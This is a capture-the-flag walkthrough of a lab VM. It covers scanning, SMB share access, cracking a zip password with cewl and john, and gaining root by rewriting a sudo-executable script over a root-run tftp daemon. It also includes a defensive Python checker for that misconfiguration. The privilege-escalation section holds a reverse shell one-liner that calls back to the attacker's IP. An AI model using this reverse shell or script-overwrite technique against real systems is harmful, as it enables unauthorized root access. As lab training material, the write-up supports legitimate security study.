# Lab setup
Download the image, import it, and boot it; it is ready to use as-is.
IP: 192.168.1.136
# Pentest walkthrough
# Initial information gathering
```
80/udp closed http
123/udp closed ntp
139/udp closed netbios-ssn
161/udp closed snmp
445/udp closed microsoft-ds
2049/udp closed nfs
7/tcp closed echo
22/tcp closed ssh
80/tcp open http
88/tcp closed kerberos-sec
110/tcp open pop3
113/tcp open ident
139/tcp open netbios-ssn
143/tcp open imap
161/tcp closed snmp
389/tcp closed ldap
443/tcp open https
445/tcp open microsoft-ds
993/tcp open imaps
995/tcp open pop3s
1337/tcp closed waste
2049/tcp closed nfs
6000/tcp closed X11
8080/tcp closed http-proxy
22222/tcp open easyengine
54321/tcp closed unknown
```
It is a WordPress site.
```
[07:56:41] 200 - 220B - /.bash_logout
[07:56:41] 200 - 4KB - /.bashrc
[07:56:46] 200 - 807B - /.profile
[07:57:33] 301 - 0B - /index.php -> http://192.168.1.136/
[07:57:38] 200 - 19KB - /license.txt
[07:57:58] 200 - 7KB - /readme.html
[07:58:21] 301 - 178B - /wp-admin -> http://192.168.1.136/wp-admin/
[07:58:22] 301 - 178B - /wp-content -> http://192.168.1.136/wp-content/
[07:58:22] 200 - 1KB - /wp-admin/install.php
[07:58:22] 200 - 0B - /wp-content/
[07:58:22] 200 - 0B - /wp-config.php
[07:58:22] 200 - 69B - /wp-content/plugins/akismet/akismet.php
[07:58:23] 200 - 0B - /wp-cron.php
[07:58:23] 301 - 178B - /wp-includes -> http://192.168.1.136/wp-includes/
[07:58:23] 200 - 0B - /wp-includes/rss-functions.php
```
```
Sharename       Type      Comment
---------       ----      -------
Anonymous       Disk
print$          Disk      Printer Drivers
sarapublic$     Disk      Sara's Public Files
IPC$            IPC       IPC Service (vengeance server (Samba, Ubuntu))
S-1-22-1-1000 Unix User\sara (Local User)
S-1-22-1-1001 Unix User\qinyi (Local User)
```
Connect to the share:
```
smbclient //192.168.1.136/sarapublic$
```
There are a few files in it:
```
eaurouge.txt    N       11  Sun Mar  7 21:46:53 2021
eaurouge        N      110  Tue Feb 23 06:06:40 2021
essay.txt       N     1257  Mon Mar  8 05:28:34 2021
gio.zip         N 11150297  Sun Feb 21 00:48:13 2021
cognac          D        0  Tue Feb 23 12:48:47 2021
blurb.txt       N      525  Sun Mar  7 21:55:24 2021
champagne       D        0  Tue Feb 23 11:15:07 2021
profile.txt     N      337  Sun Mar  7 21:45:26 2021
```
# Cracking the zip password
The zip is password-protected. Judging from the wall of text collected earlier, the intended route is probably to build a wordlist from the contents of profile.txt and brute-force the archive with it.
Start an HTTP server, serve profile.txt from it, and run cewl against that URL to generate the wordlist.
Run zip2john to produce a hash of the archive, then crack that hash with john; the password turns out to be nanotechnological.
Reading pass_reminder.txt reveals the password rule; combining it with the information found in the PPT gives the password: giovanni_130R_Suzuka
# Privilege escalation
SSH listens on port 22222. Trying the password there, it works for the qinyi account.
Check the sudo permissions:
```
User qinyi may run the following commands on vengeance:
    (root) NOPASSWD: /bin/systemctl restart nginx, /home/sara/private/eaurouge
```
So nginx can be restarted, and a file under sara's home can be executed as root; that must be the link to sara. List the processes and filter on sara:
```
qinyi@vengeance:~$ ps -ef | grep "sara"
root 972 1 0 11:53 ? 00:00:00 /usr/sbin/in.tftpd --listen --user root --address :69 --secure --create /home/sara/private
```
There is a tftp daemon, and it is serving exactly that directory, so download the file and see what it does:
```
┌──(root㉿kali)-[~]
└─# tftp 192.168.1.136 69
tftp> get eaurouge
tftp> quit
```
Open it up and take a look; that explains it:
```
┌──(root㉿kali)-[~]
└─# cat eaurouge
#!/bin/bash
touch /home/sara/public/test.txt
echo "Test file" > /home/sara/public/test.txt
chown sara:sara /home/sara/public/test.txt
chmod 644 /home/sara/public/test.txt
```
Append a reverse shell to it:
```
┌──(root㉿kali)-[~]
└─# echo "bash -c 'exec bash -i &>/dev/tcp/192.168.1.129/4444 <&1'" >> eaurouge
```
Upload it again:
```
┌──(root㉿kali)-[~]
└─# tftp 192.168.1.136 69
tftp> put eaurouge
tftp> quit
```
Start a listener, run the script via sudo, and a root shell comes straight back!
Job done.
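The root cause on this box is the combination of two findings above: a NOPASSWD sudo rule pointing at a script, and a root-run in.tftpd with --create serving that script's directory. The following audit helper is an added example, not code from the original writeup; it parses constructed copies of the `sudo -l` and `ps -ef` output shown above and flags any sudo command path that sits inside a tftpd-writable directory.

```python
import re
import shlex
from pathlib import PurePosixPath

# Constructed sample input, copied from the 'sudo -l' and 'ps -ef' output above.
SUDO_L_OUTPUT = """User qinyi may run the following commands on vengeance:
    (root) NOPASSWD: /bin/systemctl restart nginx, /home/sara/private/eaurouge
"""
PS_LINES = [
    "root 972 1 0 11:53 ? 00:00:00 /usr/sbin/in.tftpd --listen --user root "
    "--address :69 --secure --create /home/sara/private",
    "root 1 0 0 11:52 ? 00:00:01 /sbin/init",
]

# One rule line as printed by 'sudo -l': (runas) TAG: cmd, cmd, ...
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?:[A-Z]+:\s*)*(?P<cmds>.+)$")

def sudo_targets(text):
    """Absolute command paths from every rule line of 'sudo -l' output."""
    targets = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        for cmd in m.group("cmds").split(","):
            argv = shlex.split(cmd.strip())
            if argv and argv[0].startswith("/"):
                targets.append(argv[0])
    return targets

def tftpd_writable_roots(ps_lines):
    """(directory, user) for each in.tftpd started with --create/-c."""
    roots = []
    for line in ps_lines:
        argv = line.split()
        idx = [i for i, a in enumerate(argv) if a.endswith("in.tftpd")]
        if not idx or not ({"--create", "-c"} & set(argv[idx[0]:])):
            continue  # without --create, tftpd only overwrites existing world-writable files
        args = argv[idx[0] + 1:]
        user = args[args.index("--user") + 1] if "--user" in args else "nobody"
        roots += [(a, user) for a in args if a.startswith("/")]
    return roots

def find_findings(sudo_text, ps_lines):
    """Sudo targets under a tftpd-writable directory: an unauthenticated upload becomes root code."""
    roots = tftpd_writable_roots(ps_lines)
    return [{"sudo_target": t, "tftp_root": r, "tftpd_user": u}
            for t in sudo_targets(sudo_text) for r, u in roots
            if PurePosixPath(r) in PurePosixPath(t).parents]
```

The fix the check points at: sudo targets must be root-owned and not writable by anyone else, and a TFTP daemon should never run as root or expose a directory that holds privileged scripts.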
# Summary
The information-gathering phase was genuinely hard to get through: the useful information is not that obvious and usually needs a second round of processing. That is the frustrating part.
I still prefer the brute-force approach; brain teasers are no fun.